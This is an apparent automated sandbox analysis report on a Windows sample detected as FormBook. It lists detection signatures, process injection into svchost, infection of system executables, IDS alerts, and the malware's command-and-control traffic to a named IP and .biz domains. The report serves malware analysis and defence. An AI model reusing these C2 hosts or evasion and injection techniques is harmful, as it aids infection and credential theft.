Windows Analysis Report
UaOJAOMxcU.exe

Overview

General Information

Sample name: UaOJAOMxcU.exe (renamed because the original name is a hash value)
Original sample name: 2a60ca525c89948993b31e2e086a88455e71363863cfc7f835a47c1b657ea4a5.exe
Analysis ID: 1588231
MD5: 97a3cc0911d35ed963283afb08b1e671
SHA1: 129e91e7dbf157743c1ddcc332f3880e99427115
SHA256: 2a60ca525c89948993b31e2e086a88455e71363863cfc7f835a47c1b657ea4a5
Tags: exe, Worm, m0yv, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Drops executable to a common third party application directory
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • UaOJAOMxcU.exe (PID: 5036 cmdline: "C:\Users\user\Desktop\UaOJAOMxcU.exe" MD5: 97A3CC0911D35ED963283AFB08B1E671)
    • svchost.exe (PID: 6508 cmdline: "C:\Users\user\Desktop\UaOJAOMxcU.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
  • armsvc.exe (PID: 6468 cmdline: "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe" MD5: 717063427E4960E26A9AEEA93FFA8BC8)
  • alg.exe (PID: 6972 cmdline: C:\Windows\System32\alg.exe MD5: 791FE83149B027ED288BF7B3D73209AA)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000003.00000002.2399922107.0000000003190000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.2399407807.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
3.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\UaOJAOMxcU.exe", CommandLine: "C:\Users\user\Desktop\UaOJAOMxcU.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\UaOJAOMxcU.exe", ParentImage: C:\Users\user\Desktop\UaOJAOMxcU.exe, ParentProcessId: 5036, ParentProcessName: UaOJAOMxcU.exe, ProcessCommandLine: "C:\Users\user\Desktop\UaOJAOMxcU.exe", ProcessId: 6508, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\UaOJAOMxcU.exe", CommandLine: "C:\Users\user\Desktop\UaOJAOMxcU.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\UaOJAOMxcU.exe", ParentImage: C:\Users\user\Desktop\UaOJAOMxcU.exe, ParentProcessId: 5036, ParentProcessName: UaOJAOMxcU.exe, ProcessCommandLine: "C:\Users\user\Desktop\UaOJAOMxcU.exe", ProcessId: 6508, ProcessName: svchost.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T22:55:57.680935+0100 | 2018141 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.5 | 49704 | TCP
2025-01-10T22:55:57.680935+0100 | 2037771 | 1 | A Network Trojan was detected | 54.244.188.177 | 80 | 192.168.2.5 | 49704 | TCP
2025-01-10T22:55:57.553921+0100 | 2850851 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49704 | 54.244.188.177 | 80 | TCP


AV Detection

Source: UaOJAOMxcU.exe | Avira: detected
Source: http://54.244.188.177/ | Avira URL Cloud: Label: malware
Source: http://54.244.188.177/rhimsaly | Avira URL Cloud: Label: malware
Source: http://54.244.188.177/rhimsalyUS | Avira URL Cloud: Label: malware
Source: http://54.244.188.177/2 | Avira URL Cloud: Label: malware
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\AppVClient.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Windows\System32\alg.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: UaOJAOMxcU.exe | Virustotal: Detection: 78%
Source: UaOJAOMxcU.exe | ReversingLabs: Detection: 95%
Source: Yara match | File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2399922107.0000000003190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2399407807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\AppVClient.exe | Joe Sandbox ML: detected
Source: C:\Windows\System32\alg.exe | Joe Sandbox ML: detected
Source: UaOJAOMxcU.exe | Joe Sandbox ML: detected
Source: UaOJAOMxcU.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb | source: UaOJAOMxcU.exe, 00000000.00000003.2041180877.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe.0.dr
Source: Binary string: AppVClient.pdbGCTL | source: AppVClient.exe.0.dr
Source: Binary string: ALG.pdbGCTL | source: UaOJAOMxcU.exe, 00000000.00000003.2046467413.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr
Source: Binary string: AppVClient.pdb | source: AppVClient.exe.0.dr
Source: Binary string: wntdll.pdbUGP | source: UaOJAOMxcU.exe, 00000000.00000003.2052793955.0000000004240000.00000004.00001000.00020000.00000000.sdmp, UaOJAOMxcU.exe, 00000000.00000003.2050079524.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2367722513.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2366014317.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2399968118.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2399968118.000000000359E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: UaOJAOMxcU.exe, 00000000.00000003.2052793955.0000000004240000.00000004.00001000.00020000.00000000.sdmp, UaOJAOMxcU.exe, 00000000.00000003.2050079524.0000000004230000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000003.00000003.2367722513.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2366014317.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2399968118.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.2399968118.000000000359E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: ALG.pdb | source: UaOJAOMxcU.exe, 00000000.00000003.2046467413.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, alg.exe.0.dr

Spreading

Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | System file written: C:\Windows\System32\AppVClient.exe
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | System file written: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | System file written: C:\Windows\System32\alg.exe
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046C6D1 FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose

Networking

Source: Network traffic | Suricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.5:49704 -> 54.244.188.177:80
Source: Joe Sandbox View | IP Address: 54.244.188.177
Source: Network traffic | Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 54.244.188.177:80 -> 192.168.2.5:49704
Source: Network traffic | Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 54.244.188.177:80 -> 192.168.2.5:49704
Source: global traffic | HTTP traffic detected:
    POST /rhimsaly HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 804
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_004722EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile
Source: global traffic | DNS traffic detected: DNS query: pywolwnvd.biz
Source: global traffic | DNS traffic detected: DNS query: ssbzmoy.biz
Source: unknown | HTTP traffic detected:
    POST /rhimsaly HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: pywolwnvd.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 804
Source: UaOJAOMxcU.exe, 00000000.00000002.2062897697.0000000000D1E000.00000004.00000020.00020000.00000000.sdmp, UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000C17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/
Source: UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000C17000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/2
Source: UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000C1D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/rhimsaly
Source: UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000BA1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://54.244.188.177/rhimsalyUS
Source: UaOJAOMxcU.exe, 00000000.00000002.2062179176.0000000000B88000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://pywolwnvd.biz/
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00474164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00473F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0048CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

E-Banking Fraud

Source: Yara match | File source: 3.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.2399922107.0000000003190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.2399407807.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00403B3A This is a third-party compiled AutoIt script.
Source: UaOJAOMxcU.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: UaOJAOMxcU.exe, 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. [memstr_aca67744-a]
Source: UaOJAOMxcU.exe, 00000000.00000002.2061582798.00000000004B4000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` [memstr_341c3ddf-f]
Source: UaOJAOMxcU.exe | String found in binary or memory: This is a third-party compiled AutoIt script. [memstr_08ed7085-2]
Source: UaOJAOMxcU.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer` [memstr_49b8090b-5]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0042CBC3 NtClose
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472B60 NtClose,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_034735C0 NtCreateMutant,LdrInitializeThunk
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03474340 NtSetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03474650 NtSuspendThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472BE0 NtQueryValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472BF0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472BA0 NtEnumerateValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472AD0 NtReadFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472AF0 NtWriteFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472F30 NtCreateSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472FE0 NtCreateFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472FA0 NtQuerySection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472FB0 NtResumeThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472E30 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472EE0 NtQueueApcThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472E80 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472D00 NtSetInformationFile
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472D10 NtMapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472D30 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472DD0 NtDelayExecution
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472DB0 NtEnumerateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472C60 NtCreateKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472C70 NtFreeVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472C00 NtQueryInformationProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472CC0 NtQueryVirtualMemory
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472CF0 NtOpenProcess
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03472CA0 NtQueryInformationToken
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03473010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03473090 NtSetValueKey
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_034739B0 NtGetContextThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03473D70 NtOpenThread
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03473D10 NtOpenProcessToken
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_0046A1EF GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_00458310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\UaOJAOMxcU.exe | Code function: 0_2_004651BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B4F403_2_034B4F40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03482F283_2_03482F28
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03460F303_2_03460F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E2F303_2_034E2F30
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03432FC83_2_03432FC8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344CFE03_2_0344CFE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034BEFA03_2_034BEFA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440E593_2_03440E59
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FEE263_2_034FEE26
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FEEDB3_2_034FEEDB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03452E903_2_03452E90
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FCE933_2_034FCE93
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344AD003_2_0344AD00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DCD1F3_2_034DCD1F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0343ADE03_2_0343ADE0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03458DBF3_2_03458DBF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03440C003_2_03440C00
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03430CF23_2_03430CF2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E0CB53_2_034E0CB5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342D34C3_2_0342D34C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F132D3_2_034F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0348739A3_2_0348739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345B2C03_2_0345B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E12ED3_2_034E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034452A03_2_034452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0347516C3_2_0347516C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0342F1723_2_0342F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0350B16B3_2_0350B16B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0344B1B03_2_0344B1B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EF0CC3_2_034EF0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034470C03_2_034470C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F70E93_2_034F70E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FF0E03_2_034FF0E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FF7B03_2_034FF7B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034856303_2_03485630
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F16CC3_2_034F16CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F75713_2_034F7571
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_035095C33_2_035095C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DD5B03_2_034DD5B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034314603_2_03431460
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FF43F3_2_034FF43F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FFB763_2_034FFB76
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B5BF03_2_034B5BF0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0347DBF93_2_0347DBF9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345FB803_2_0345FB80
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FFA493_2_034FFA49
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034F7A463_2_034F7A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034B3A6C3_2_034B3A6C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034EDAC63_2_034EDAC6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034DDAAC3_2_034DDAAC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03485AA03_2_03485AA0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034E1AA33_2_034E1AA3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034499503_2_03449950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0345B9503_2_0345B950
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034D59103_2_034D5910
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034AD8003_2_034AD800
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034438E03_2_034438E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FFF093_2_034FFF09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03441F923_2_03441F92
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_034FFFB13_2_034FFFB1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03449EB03_2_03449EB0
